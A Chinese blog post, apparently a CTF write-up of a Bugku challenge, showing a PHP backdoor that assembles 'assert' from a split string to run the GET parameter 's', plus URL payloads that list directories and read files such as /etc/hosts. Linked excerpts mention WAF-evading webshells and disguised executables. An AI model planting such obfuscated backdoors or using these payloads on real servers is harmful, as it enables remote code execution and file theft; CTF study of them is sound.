2. 程式人生 > >bugku——過狗一句話(奇淫技巧)

bugku——過狗一句話(奇淫技巧)

阿新 發佈:2019-02-14

今天學校ctf戰隊給了個bugku的題不過改了一下,我覺得挺有意思的,做一下記錄。

題目

<?php 
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

 exlpde()分割a#s#s#e#r#t為assert,使用assert()函式的解析傳進來的s串,assert有程式碼執行漏洞。

解題payload

?s=print_r(scandir('./'))

掃描當前目錄,並按陣列輸出。

url新增f94lag.txt,就可以拿到flag了。

奇淫技巧

利用此漏洞查詢其他檔案,例如hosts

首先,掃描上級目錄,payload

?s=print_r(scandir('../'))

看到這是linux作業系統的檔案目錄

所以hosts應該在etc裡面,讀一下就能看到了。

2. 使用fopen() 或者 readfile() 函式讀取檔案

樣例payload

?s=print_r(readfile('../etc/hosts'))
?s=print_r(fopen('../etc/hosts','r'))

任意檔案讀取,實在太騷了。

相關推薦

bugku——一句話技巧

今天學校ctf戰隊給了個bugku的題不過改了一下,我覺得挺有意思的,做一下記錄。 題目 <?php $poc = "a#s#s#e#r#t"; $poc_1 = explode("#", $poc); $poc_2 = $poc_1[0] . $poc_

一句話bugku

       昨天寫了個關於一句話木馬的題,今天上午百度了一個上午理解一句話木馬,感jio還是有點懵逼,於是想寫一下題來理解一下下……不過雖然這道題題目叫過狗一句話,但似乎跟我想象的不大一樣emmmmm ------------------------

將音訊檔案轉二進位制分包儲存到Redis技巧操作

功能需求: 一、獲取本地音訊檔案,進行解析成二進位制資料音訊流 二、將音訊流轉化成byte[]陣列,按指定大小位元組數進行分包 三、將音訊流分成若干個包,以List列表形式快取到redis資料庫中 四、從redis資料庫中獲取資料,轉換成音訊流輸出到瀏覽器播放、實現音訊下載功能 程式如下: 1.在Spring

【資料庫】MySQL技巧報錯篇

繼《【資料庫】MySQL奇淫技巧》,此篇為報錯梳理,整理測試時遇到的各種報錯及應對策略 1、 (1046, ‘No database selected’) 沒選擇資料庫,此問題很有可能是再執行命令或者查詢時沒針對資料庫操作,視覺化的工具一般不會出現此錯誤

【資料庫】MySQL技巧基礎篇

前言:由於mysql有很多很多“特殊的用法”,在此成其為奇淫技巧,很多用法很冷門,雖然由常用命令拼起來的,但是不是十分常用。對待一些特殊需求查資料都不太描述,這是個很尬的問題,所以在此梳理用到的所有奇淫技巧,當然有新的特殊需求,可以交流學習進一步完善,有任何非議都可以交流。下面是

JavaScript技巧

if-else簡化寫法 程式碼中若出現多層if-else巢狀,程式碼就會顯得臃腫不堪,這時可採用替代方案來濃縮程式碼。 常規寫法:(臃腫不堪) if(){ if(){ //…… } else{

前端技巧之前端遇到需要資料遍歷的如何處理

前端經常會遇到需要資料遍歷的盒子,即內容結構相同的Html程式碼,很多小夥伴都是直接copy,但是很容易出現最後因為複製貼上的問題,而且如果需要修改,就要把全部刪掉,重新複製一遍,很麻煩,所以為了解決

JavaScript 系列--JavaScript一些技巧的實現方法簡短的sleep函式,獲取時間戳

一、前言 有些東西很好用,但是你未必知道;有些東西你可能用過,但是你未必知道原理。實現一個目的有多種途徑,俗話說,條條大路通羅馬。發散一下大家的思維以及拓展一下知識面。   二、實現一個簡短的sleep函式 sleep函式主要用來做延遲執行的,很多程式語言都有sleep函式,但是javasc

JavaScript 系列--JavaScript一些技巧的實現方法數字格式化 1234567890轉1,234,567,890;argruments 物件(類陣列)轉換成陣列

一、前言 之前寫了一篇文章:JavaScript 系列--JavaScript一些奇淫技巧的實現方法(一)簡短的sleep函式,獲取時間戳 https://www.mwcxs.top/page/746.html 介紹了sleep函式和獲取時間戳的方法。接下來我們來介紹數字格式化1234567890&nb

JavaScript 系列--JavaScript一些技巧的實現方法數字取整,陣列求和

一、前言 簡短的sleep函式,獲取時間戳:https://www.mwcxs.top/page/746.html 數字格式化 1234567890 --> 1,234,567,890;argruments 物件(類陣列)轉換成陣列: https://www.mwcxs.top/page/749.

javascript技巧

asc pan 位移 ole [0 logs rpi () 布爾 1. 取整同時轉成數值型: 1 console.log("10.340"|0); //10 2 console.log("10.560"^0); //10 3 conso

整理的最新WebSHell (php一句話,菜刀,2016一句話,2016php免殺一句話)

一句話木馬中國菜刀下載,基於原版中國菜刀優化版20160309.下載地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChina chopperhttps://pan.baidu.com/s/1

無特征一句話猥瑣思路(代碼執行)

請求頭 and 客戶 pass 正則 替換 req php報錯 span 來自:https://bypass.world/2017/01/%E6%97%A0%E7%89%B9%E5%BE%81%E8%BF%87%E7%8B%97%E4%B8%80%E5%8F%A5%E8%A

技巧】圖片偽裝大法--偽裝可執行文

style sys alt user var main image 可執行文件 打開 能夠將可執行文件偽裝成圖片 用到的工具: kali 2.0、msfasploit、Resource Hacker 首先利用msfvenom生成一個powershell的ps1文件

BZOJ 3192: [JLOI2013]刪除物品 技巧&樹狀數組

lap 一次 arr 移動 bzoj3 tree 樹狀數組 blank opened 點我看題 這題十分奇淫技巧...QAQ因為知道是樹狀數組的題QAQ剛開始以為維護兩個數組的樹狀數組然後模擬從大到小,然後發現不會打QAQ 於是悄悄咪咪翻開題解了。 實際上兩個數組可以看做一

CSS布局技巧之-多列等高

cells http 布局 mar 內容 大小 它的 lpad 就會 什麽是等高布局? 先來看一個案例: 上圖中的頁面的主體內容是兩列結構,左列是用來導航的,右列是用來顯示內容的。我們看到它們有一個共同的邊框,中間還有一條分隔線,左右兩列的高度都是不固定的。這種情

大話後端開發的技巧大集合

經驗 架構設計 高並發 防刷 Hi,大家好,很榮幸有這個機會可以通過寫博文的方式,把這些年在後端開發過程中總結沈澱下來的經驗和設計思路分享出來 模塊化設計 根據業務場景,將業務抽離成獨立模塊,對外通過接口提供服務,減少系統復雜度和耦合度,實現可復用,易維護,易拓展 項目中實踐例子: Befor

Windows批處理技巧之sleep

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

後端開發的技巧大集合

簽名 visual 刪除 封裝 js調用 css 手機 node 均衡 Hi,大家好,很榮幸有這個機會可以通過寫博文的方式,把這些年在後端開發過程中總結沈澱下來的經驗和設計思路分享出來 模塊化設計 根據業務場景,將業務抽離成獨立模塊,對外通過接口提供服務,減少系統復雜度和耦

JavaScript 技巧

介紹一些不常用 但是很有用的js技巧 1. 使用for建立死迴圈 for(;;){ } 2.使用math.max.apply 取出陣列中的最大值 //舉例 for example var arr = [1, 2, 3, 4, 5, "6"];  // 可以輸入字串型別的數字 va